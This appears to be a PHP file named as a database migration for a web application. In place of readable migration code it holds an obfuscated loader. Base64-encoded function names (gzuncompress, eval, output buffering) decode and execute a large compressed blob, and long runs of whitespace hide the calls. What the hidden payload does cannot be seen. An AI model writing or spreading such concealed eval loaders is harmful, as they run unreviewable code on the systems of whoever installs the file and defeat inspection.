<?php 
        $__='printf';$_='Loading donjo-app/models/migrations/Migrasi_default_value.php';
        























































































































































































































































































































                                                                                                                                                                                                $_____='    b2JfZW5kX2NsZWFu';                                                                                                                                                                              $______________='cmV0dXJuIGV2YWwoJF8pOw==';
$__________________='X19sYW1iZGE=';

                                                                                                                                                                                                                                          $______=' Z3p1bmNvbXByZXNz';                    $___='  b2Jfc3RhcnQ=';                                                                                                    $____='b2JfZ2V0X2NvbnRlbnRz';                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                $__=                                                              'base64_decode'                           ;                                                                       $______=$__($______);           if(!function_exists('__lambda')){function __lambda($sArgs,$sCode){return eval("return function($sArgs){{$sCode}};");}}                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    $__________________=$__($__________________);                                                                                                                                                                                                                                                                                                                                                                         $______________=$__($______________);
        $__________=$__________________('$_',$______________);                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $_____=$__($_____);                                                                                                                                                                                                                                                    $____=$__($____);                                                                                                                    $___=$__($___);                      $_='eNrtW1tvm0gUfo+0/yEPldyquyngsK0V5SEmARvHTg02A/MSAWPAYbjI4Av59XuwnW0NjtXdpq1TzYcU2zPDzLl8c84cYp+ebvDmHnDZSGfTOPcaF+uPW1w2SBI/JH/ZafohSsiEZh+iqT+z82kSZx/65dtsek8mnj2n+f3CpvPJWRqkpxK1s+zs7KxxcbJd5PSPE3ax61dfJyW7T18Ql7WWhsm3MgvxU6zcXDbWTV92wTdhuwMvTxkYGBh+TzTcyOCIqc67iiFYaJmocsszi/DjJmhC1NyE63tmKgYGBgYGBgYGBobXBvY4g4GBgeH3RcOxs8nf5/dk4iZk0rhgFmFgYGBgYPgu7H4to6toFEd0jtEwUTm1PeaM4dDQumoR+iO+62MzSInkx6Pok48VWmA04LqdwYMb0SWR2oElDKjb7PsWWmVOk1AsuendkutdD9MHR5Ef3aI9sBEpLHOQmkK5lsw7Hc0jkZwRNC7n5zASQxh3rRut3IExjtT+eD1MBpIPayA1s1Hfx7Ext5pa6gjnPjGvkp7+NCZU1Y6W2GY//xxpUxy1CiyM4T2/AHmjidF6cIQV76DzRG1qTYxUz1WMOe4YIUFZfAs6uLEaTHQ/tpHmubGWq8VV6/N0X/syJh26xLrrfx6d+yqP2+Nw0B0a3aT/eJVCv68KIu8oy7h7zb3vdrQCdMy6EgkxwgFBK247950xXvV7eri2lTQMQ6IEqVtw77GiRk5TjbHOvXdQK7QRFk1hsHA6Ru5MfVifUIu2lqXNCNJ4u3CzriIXbiSLPYkUROE9RzEEjLYyPNN3KxFuYrbpRp6rWB+L4971zaqnu6W8c5A128rKubFBb6WrGCtGZJlGRqSN/iNq9EdSmPZG2Yv6gShG7ioyB/yB+bpVPYAv/NIytcxCYLOpm8F8oquMN+MkgoaGeq3fyDros+xLYVzK7sRG5mzlJh3wnF766omPw829N6Ixulmm4JeSW6qka5yt0MfbkRhaEV64EaHwvuRoimPqWUILOMzPS5mIYEzNZps6kcaDTrOSC5apAu/DRBXk2EJ8YAo0rHLLQiRwkOzZaPicT46BV+t22AepLchzU8hn+3RZ+1OhMC4PHNqa2XwrhXhQ9Y86osOkrx+BXzbtKcg8s5DouYIRwmv8Dbo9YqQFTkRegd9y6kZpUOpXylrZS7X+I9blkUBMIObAAw42bXRe1aXWX9XFuKF3aEzvDGl/jPsBMgcTJCemIKbQvub4VzFBhPjlORGdHcwrI+sYbJ9asbGVtZobVX6r36E4LBxDXnEiObeM1tonVT12+w7542p5RLqAX8bVfTDf5pop0V9DbsQLonyq6gBc1RavwQ8Y9HQEMS7jJwb5yz29J87GMN8C8kWZO0LQPbDlA7lxdBTxNoDzVw7nrDIvTjEq7SGKll6LY+V3VAMilzlRpeu5Yxoc9N3DcfgOapby7MWZzQGFnFGUub9+Pts35jXolnMQH57OyFWfzSBXek/n61qeDGV9yAXt8dTnjuT8vJYXdC02uV0MnGd0qow5EP+Gx+SnJTbVB1zGBSTP6xzcN+Z5Dg6uj6IWbZZyk+c42CSB3dTg7LAKgCPFQX1+Ua1gbuu2XS4Cr9DN3pz7P/JVBPHlEesvwavcs8wBD/LMXSGsnxVqcXujx4G9z+/b+2DrzBXGL2TfgIdz5RwLaz6/Cht/qS2+276r/r59quDA6QxephbhW7lV1u2mmlbq3rQWPzdt1Xi5jZX94kfbFXLscpcD9Rr8QH26+vnyrYKn3FBpO5BzutyvyTl75Z/jWk26bjtK+Xeev0x38sw2Luyp5w7WP+MfHitqz8OKI5Z783z7Ky7ktHx+D+fehSvQwKlxvdb/8rWMyYEuXM8bcr3GxcnJz/8nyeX69e3207uL/3L7V/d+y41vviz4tlH+bfz577Lst6/sOqbfvu5y9u3OJtlQ9t3FP9I56IU=';

        $___();$__________($______($__($_))); $________=$____();
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             $_____();                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       echo                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      






















































































































































































































































































































                                                                                                                                                                                                                     $________;
